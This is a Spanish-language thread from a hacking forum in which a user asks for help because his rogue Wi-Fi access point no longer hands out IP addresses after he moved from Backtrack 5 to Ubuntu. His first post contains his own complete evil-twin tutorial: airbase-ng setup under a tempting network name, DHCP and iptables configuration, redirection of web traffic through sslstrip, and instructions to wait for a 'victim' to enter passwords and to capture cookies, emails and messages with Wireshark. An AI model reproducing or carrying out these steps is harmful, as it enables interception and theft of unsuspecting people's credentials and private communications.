comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] No consigo conectar con mi fake AP

  • 2 Respuestas
  • 1815 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Desconectado bethome365

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Octubre 08, 2013, 04:17:45 pm »
Hola a todos, este es mi primer post, pero no será el último...

Hace poco que decidí pegarle la patada al güindows y pasarme al linux, empecé con backtrack 5 pero ahora me acabo de instalar ubuntu 12.04 y hay algunas cosas que no consigo hacer. Estoy intentando crear un fake AP y con Backtrack me salia perfecto pero con ubuntu no soy capaz de conectarme, siempre se queda intentando conseguir una IP asi que creo que el problema esta en la configuracion de mi dhcpd, he intentado configurar el dhcpd.conf de 100 maneras diferentes y tambien las iptables pero no hay manera de que mi smartphone se conecte, he leido todos los tutoriales de la red y estoy ya un poco desesperado asi que agradeceré cualquier ayuda que podais prestarme con este tema y espero quedarme mucho tiempo aqui aprendiendo de los mejores. paso a daros mi configuracion (la que funcionaba en backtrack 5) y los pasos que seguia en backtrack. En ubuntu he echo tantas cosas ya que ya ni me acuerdo...

Salida ifconfig:
eth0      Link encap:Ethernet  direcciónHW 48:5b:39:cf:96:89
          Direc. inet:192.168.1.178  Difus.:192.168.1.255  Másc:255.255.255.0
          Dirección inet6: fe80::4a5b:39ff:fecf:9689/64 Alcance:Enlace
          ACTIVO DIFUSIÓN FUNCIONANDO MULTICAST  MTU:1500  Métrica:1
          Paquetes RX:53607 errores:0 perdidos:0 overruns:0 frame:0
          Paquetes TX:47321 errores:0 perdidos:0 overruns:0 carrier:0
          colisiones:0 long.colaTX:1000
          Bytes RX:47246939 (47.2 MB)  TX bytes:8069980 (8.0 MB)

Salida iwconfig:

wlan0     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:on

Pasos que seguia en Backtrack:

Esto es un tutorial que me hice yo mismo (con copy/paste de otras webs)  para acordarme en un futuro de los pasos que tenia que seguir.

COMPROBAR NOMBRE DE INTERFACES CON IWCONFIG EN MI CASO SON ESTAS:

La interface de red cableada: eth0

La interface de red inhalambrica: wlan0

La interface en modo monitor es: mon0

La Interface resultante del comando airbase (el softAP) es: at0

apt-get install dhcp3-server bind9 (SOLO SI NO ESTAN INSTALADOS dhpd3-server y bind9)

airmon-ng start wlan0
/etc/init.d/dhcp3-server stop
/etc/init.d/bind9 stop
gedit /etc/dhcp3/dhcpd.conf

EL ARCHIVO dhpd.conf TIENE QUE TENER LA SIGUIENTE INFORMACION:

ddns-update-style ad-hoc;
default-lease-time 600;
default-lease-time 7200;
authoritative;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 192.168.1.1;
range 192.168.2.130 192.168.2.140;

}

LA IP 192.168.1.1 TIENE QUE SER TU PUERTA DE ENLACE REAL.

gedit /etc/default/dhcp3-server

INDICAR LAS INTERFACES, EN MI CASO:

INTERFACES=”eth0 wlan0”

airbase-ng -I 100 -P -C 2 -c 3 --essid WIFI_COMPARTIDA mon0

CAMBIAR EL NOMBRE DE LA RED POR EL QUE MAS NOS CONVENGA.

ifconfig at0 up
ifconfig at0 192.168.2.129 netmask 255.255.255.128
route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129

dhcpd3 -d -f at0

SI NOS DA ERROR "Can’t create PID file /var/run/dhcpd.pid: Permission denied" HAY QUE HACER:
ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid

/etc/init.d/bind9 start

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward

nano /etc/sysctl.conf
net.ipv4.conf.default.forward ing=1 net.ipv4.conf.all.forwarding=1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

DONDE PONE "eth0" TENEMOS QUE PONER NUESTRA INTERFACE REAL CON LA QUE ESTAMOS CONECTADOS A INTERNET (probablemente eth0 si estamos conectados por cable y wlan0 si estamos conectados por wifi)

DONDE PONE "192.168.1.1" PONEMOS NUESTRA PUERTA DE ENLACE PREDETERMINADA

PODEMOS CAMBIAR EL PUERTO "10000" POR OTRO, SIEMPRE QUE PONGAMOS EL MISMO EN SSLSTRIP

COLOCARSE EN LA CARPETA DONDE HEMOS DESCOMPRIMIDO SSLSTRIP Y EJECUTAR:

sslstrip -l 10000

ó

sslstrip -f -w sslstrip.txt   (MAS RECOMENDABLE)

EL PUERTO "10000" PODEMOS CAMBIARLO POR CUALQUIERA SIEMPRE QUE PONGAMOS EL MISMO QUE EN LA IPTABLE ANTERIOR.
PODEMOS CAMBIAR EL NOMBRE DEL ARCHIVO "sslstrip.txt" INCLUSO INDICARLE LA RUTA DONDE SE TIENE QUE GUARDAR, SI NO LE INDICAMOS RUTA SE GUARDARA EN LA MISMA CARPETA DONDE HEMOS DESCOMPRIMIDO SSLSTRIP. EN MI CASO "/Desktop/Evil Twin/sslstrip-0.9/sslstrip#"

AHORA SOLO TENEMOS QUE ESPERAR A QUE UNA VICTIMA SE CONECTE A NUESTRO AP FALSO Y PONGA CONTRASEÑAS EN SUS PAGINAS PREFERIDAS, TANTO SI SON HTTP O HTTPS NOS APARECERAN EN EL ARCHIVO CREADO CON SSLSTRIP (en este caso "sslstrip.txt")

PODEMOS ARRANCAR WIRESHARK PARA CAPTAR OTRO TIPO DE TRAFICO (cookies, fotos, mensajes en redes sociales, emails, etc...)

El caso es que siguiendo los mismos pasos, aunque algunos comandos y rutas me he dado cuenta de que han cambiado al actualizar a isc-dhcp-server, no consigo conectarme al AP con mi smartphone (Android) como lo hacia antes con Backtrack 5.

Normalmente soluciono mis problemas con google, pero despues de 10 dias intensos buscando por toda la red la verdad es que estoy un poco decepcionado y creo que a llegado el momento de buscar ayuda, asi que agradeceria cualquier ayuda que podais darme.
« Última modificación: Agosto 21, 2014, 09:31:24 am por Expermicid »

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #1 en: Octubre 09, 2013, 03:54:19 pm »
Revisa si tienes todo instalado, aircrack y el resto de los paquetes!

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado bethome365

  • *
  • Underc0der
  • Mensajes: 5
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Octubre 10, 2013, 07:13:34 am »
Hola Sniffer, gracias por contestar. Me imagino que si que tengo todo instalado, el caso es que no me da ningun error, el fake AP se crea correctamente pero cuando intento conectarme a el, siempre se queda en "obteniendo direccion IP" por lo que creo que el problema esta en el dhcp. Otra cosa que ocurre es que si intento levantar el dhcp con el comando "sudo service isc-dhcp-server start" no se levanta, se queda en estado "sop/waiting" al no ser que en en el dhcp.conf le ponga una subnet dentro de mi rango pero entonces tampoco consigo conectarme a el ya que por lo que tengo entendido la subnet del fake AP tiene que estar fuera de mi rango. El error que me da en mi syslog cuando intento levantar el servicio es este:

 No subnet declaration for eth0 (192.168.1.178).
 ** Ignoring requests on eth0.  If this is not what
    you want, please write a subnet declaration
   in your dhcpd.conf file for the network segment
   to which interface eth0 is attached. **


   Not configured to listen on any interfaces!


Mi dhcp.conf esta asi:

ddns-update-style ad-hoc;
 default-lease-time 600;
 default-lease-time 7200;
 authoritative;
 subnet 192.168.2.128 netmask 255.255.255.128 {
 option subnet-mask 255.255.255.128;
 option broadcast-address 192.168.2.255;
 option routers 192.168.2.129;
 option domain-name-servers 192.168.1.1;
 range 192.168.2.130 192.168.2.140;
     
}

y mi ifconfig es este:

eth0      Link encap:Ethernet  direcciónHW 48:5b:39:cf:96:89 
          Direc. inet:192.168.1.178  Difus.:192.168.1.255  Másc:255.255.255.0
          Dirección inet6: fe80::4a5b:39ff:fecf:9689/64 Alcance:Enlace
          ACTIVO DIFUSIÓN FUNCIONANDO MULTICAST  MTU:1500  Métrica:1
          Paquetes RX:1624557 errores:0 perdidos:0 overruns:0 frame:0
          Paquetes TX:1168697 errores:0 perdidos:0 overruns:0 carrier:0
          colisiones:0 long.colaTX:1000
          Bytes RX:2175552940 (2.1 GB)  TX bytes:107091742 (107.0 MB)

a ver si alguien me puede ayudar  :)

 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 7875
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2245
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1661
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 3071
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Problem al instalar Windows "cualquier windows"

Iniciado por Made

Respuestas: 7
Vistas: 3062
Último mensaje Septiembre 03, 2012, 04:53:08 pm
por Made